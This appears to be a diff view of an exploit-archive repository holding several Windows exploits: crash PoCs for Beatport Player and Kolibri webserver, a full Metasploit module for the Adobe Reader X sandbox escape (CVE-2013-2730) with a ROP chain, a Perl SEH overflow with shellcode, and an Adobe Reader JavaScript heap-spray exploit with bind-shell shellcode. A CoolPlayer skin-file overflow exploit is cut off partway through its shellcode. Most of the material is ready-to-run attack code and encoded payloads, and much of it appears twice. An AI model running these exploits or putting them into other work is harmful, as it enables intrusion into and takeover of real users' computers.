# http://www.brothersoft.com/beatport-player-download-62319.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
# milw0rm.com [2009-05-01]
#####################################################################################################
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
# Discovered by SirGod - www.mortal-team.net
# Error log :
#
# Logged at Friday, May 01, 2009 14:03:17
# FileVersion: 1.0.0.283
# ProductVersion: 1.0.0.0
# Exception Code: 0xC0000005
# Exception Addr: 0x001B:0x004317F0
# Exception Module: TraktorBeatport.exe
# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
# The memory could not be "read"
# http://www.brothersoft.com/beatport-player-download-62319.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
# milw0rm.com [2009-05-01]

68
platforms/windows/dos/9621.txt
View file

@ -1,34 +1,34 @@
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] [Denial Of Service / CRASH]
("A" x 200; #Late crash)
Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# milw0rm.com [2009-09-10]
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] [Denial Of Service / CRASH]
("A" x 200; #Late crash)
Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# milw0rm.com [2009-09-10]

358
platforms/windows/local/25776.rb
View file

@ -1,358 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
super(update_info(info, {
'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
'Description' => %q{
This module exploits a vulnerability on Adobe Reader X Sandbox. The
vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
process to write register values which can be used to trigger a buffer overflow on
the AdobeCollabSync component, allowing to achieve Medium Integrity Level
privileges from a Low Integrity AcroRd32.exe process. This module has been tested
successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2730' ],
[ 'OSVDB', '93355' ],
[ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => 'meterpreter',
'Payload' =>
{
'Space' => 12288,
'DisableNops' => true
},
'Targets' =>
[
[ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
{
'AdobeCollabSyncTrigger' => 0x18fa0,
'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
}
],
],
'DefaultTarget' => 0,
'DisclosureDate'=> 'May 14 2013'
}))
end
def on_new_session
print_status("Deleting Malicious Registry Keys...")
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
end
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
end
print_status("Cleanup finished")
end
# Test the process integrity level by trying to create a directory on the TEMP folder
# Access should be granted with Medium Integrity Level
# Access should be denied with Low Integrity Level
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
session.shell_command_token("mkdir #{new_dir}")
rescue
return true
end
if directory?(new_dir)
session.shell_command_token("rmdir #{new_dir}")
return false
else
return true
end
end
def check_trigger
signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
if signature == target['AdobeCollabSyncTriggerSignature']
return true
end
return false
end
def collect_addresses
# find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
@addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")
# find kernel32.dll
kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
@addresses['kernel32.dll'] = kernel32["return"]
if @addresses['kernel32.dll'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
end
vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")
# find kernel32.dll methods
virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
@addresses['VirtualAlloc'] = virtual_alloc["return"]
if @addresses['VirtualAlloc'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
end
vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")
reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
@addresses['RegGetValueA'] = reg_get_value["return"]
if @addresses['RegGetValueA'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
end
vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")
# find ntdll.dll
ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
@addresses['ntdll.dll'] = ntdll["return"]
if @addresses['ntdll.dll'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
end
vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
end
# Search a gadget identified by pattern on the process memory
def search_gadget(base, offset_start, offset_end, pattern)
mem = base + offset_start
length = offset_end - offset_start
mem_contents = session.railgun.memread(mem, length)
return mem_contents.index(pattern)
end
# Search for gadgets on ntdll.dll
def search_gadgets
ntdll_text_base = 0x10000
search_length = 0xd6000
@gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
if @gadgets['mov [edi], ecx # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
end
@gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
@gadgets['mov [edi], ecx # ret'] += ntdll_text_base
vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")
@gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")
@gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
if @gadgets['pop edi # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
end
@gadgets['pop edi # ret'] += @addresses['ntdll.dll']
@gadgets['pop edi # ret'] += ntdll_text_base
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")
@gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
if @gadgets['pop ecx # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
end
@gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
@gadgets['pop ecx # ret'] += ntdll_text_base
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
end
def store(buf, data, address)
i = 0
while (i < data.length)
buf << [@gadgets['pop edi # ret']].pack("V")
buf << [address + i].pack("V") # edi
buf << [@gadgets['pop ecx # ret']].pack("V")
buf << data[i, 4].ljust(4,"\x00") # ecx
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
i = i + 4
end
return i
end
def create_rop_chain
mem = 0x0c0c0c0c
buf = [0x58000000 + 1].pack("V")
buf << [0x58000000 + 2].pack("V")
buf << [0].pack("V")
buf << [0x58000000 + 4].pack("V")
buf << [0x58000000 + 5].pack("V")
buf << [0x58000000 + 6].pack("V")
buf << [0x58000000 + 7].pack("V")
buf << [@gadgets['ret']].pack("V")
buf << rand_text(8)
# Allocate Memory To store the shellcode and the necessary data to read the
# shellcode stored in the registry
buf << [@addresses['VirtualAlloc']].pack("V")
buf << [@gadgets['ret']].pack("V")
buf << [mem].pack("V") # lpAddress
buf << [0x00010000].pack("V") # SIZE_T dwSize
buf << [0x00003000].pack("V") # DWORD flAllocationType
buf << [0x00000040].pack("V") # flProtect
# Put in the allocated memory the necessary data in order to read the
# shellcode stored in the registry
# 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
reg_key_length = store(buf, reg_key, mem)
# 2) The reg entry: shellcode
value_key = "shellcode\x00"
store(buf, value_key, mem + reg_key_length)
# 3) The output buffer size: 0x3000
size_buffer = 0x3000
buf << [@gadgets['pop edi # ret']].pack("V")
buf << [mem + 0x50].pack("V") # edi
buf << [@gadgets['pop ecx # ret']].pack("V")
buf << [size_buffer].pack("V") # ecx
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
# Copy the shellcode from the the registry to the
# memory allocated with executable permissions and
# ret into there
buf << [@addresses['RegGetValueA']].pack("V")
buf << [mem + 0x1000].pack("V") # ret to shellcode
buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER
buf << [mem].pack("V") # lpSubKey
buf << [mem + 0x3c].pack("V") # lpValue
buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY
buf << [0].pack("V") # pdwType
buf << [mem + 0x1000].pack("V") # pvData
buf << [mem + 0x50].pack("V") # pcbData
end
# Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
def store_data_registry(buf)
vprint_status("Creating the Registry Key to store the shellcode...")
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
vprint_good("Registry Key created")
else
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
end
vprint_status("Storing the shellcode in the Registry...")
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
vprint_good("Shellcode stored")
else
fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
end
# Create the Malicious registry entry in order to exploit....
vprint_status("Creating the Registry Key to trigger the Overflow...")
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
vprint_good("Registry Key created")
else
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
end
vprint_status("Storing the trigger in the Registry...")
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
vprint_good("Trigger stored")
else
fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
end
end
def trigger_overflow
vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
# Create a thread in order to execute the necessary code to launch AdobeCollabSync
ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
if ret['return'] < 1
print_error("Unable to CreateThread")
return
end
hthread = ret['return']
vprint_status("Resuming the Thread...")
# Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
ret = client.railgun.kernel32.ResumeThread(hthread)
if ret['return'] < 1
fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
end
end
def check
@addresses = {}
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
@addresses['AcroRd32.exe'] = acrord32["return"]
if @addresses['AcroRd32.exe'] == 0
return Msf::Exploit::CheckCode::Unknown
elsif check_trigger
return Msf::Exploit::CheckCode::Vulnerable
else
return Msf::Exploit::CheckCode::Detected
end
end
def exploit
@addresses = {}
@gadgets = {}
print_status("Verifying we're in the correct target process...")
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
@addresses['AcroRd32.exe'] = acrord32["return"]
if @addresses['AcroRd32.exe'] == 0
fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
end
vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
print_status("Checking the AcroRd32.exe image...")
if not check_trigger
fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
end
print_status("Checking the Process Integrity Level...")
if not low_integrity_level?
fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
end
print_status("Collecting necessary addresses for exploit...")
collect_addresses
print_status("Searching the gadgets needed to build the ROP chain...")
search_gadgets
print_good("Gadgets collected...")
print_status("Building the ROP chain...")
buf = create_rop_chain
print_good("ROP chain ready...")
print_status("Storing the shellcode and the trigger in the Registry...")
store_data_registry(buf)
print_status("Executing AdobeCollabSync.exe...")
trigger_overflow
end
end

54
platforms/windows/local/6157.pl
View file

@ -1,27 +1,27 @@
#!/usr/bin/perl
# k`sOSe - 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" .
"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
"\x1e\x28\x44\xd4";
print $shellcode .
"\x41" x (218 - length($shellcode)) .
"\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3
# milw0rm.com [2008-07-29]
#!/usr/bin/perl
# k`sOSe - 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" .
"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
"\x1e\x28\x44\xd4";
print $shellcode .
"\x41" x (218 - length($shellcode)) .
"\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3
# milw0rm.com [2008-07-29]

86
platforms/windows/local/7006.txt
View file

@ -1,43 +1,43 @@
Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");
//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
# milw0rm.com [2008-11-05]
Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");
//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
# milw0rm.com [2008-11-05]

150
platforms/windows/local/7536.cpp
View file

@ -1,75 +1,75 @@
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/
#include <iostream>
#include <fstream>
#include <cstdlib> //exit
using namespace std;
int main()
{
//win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
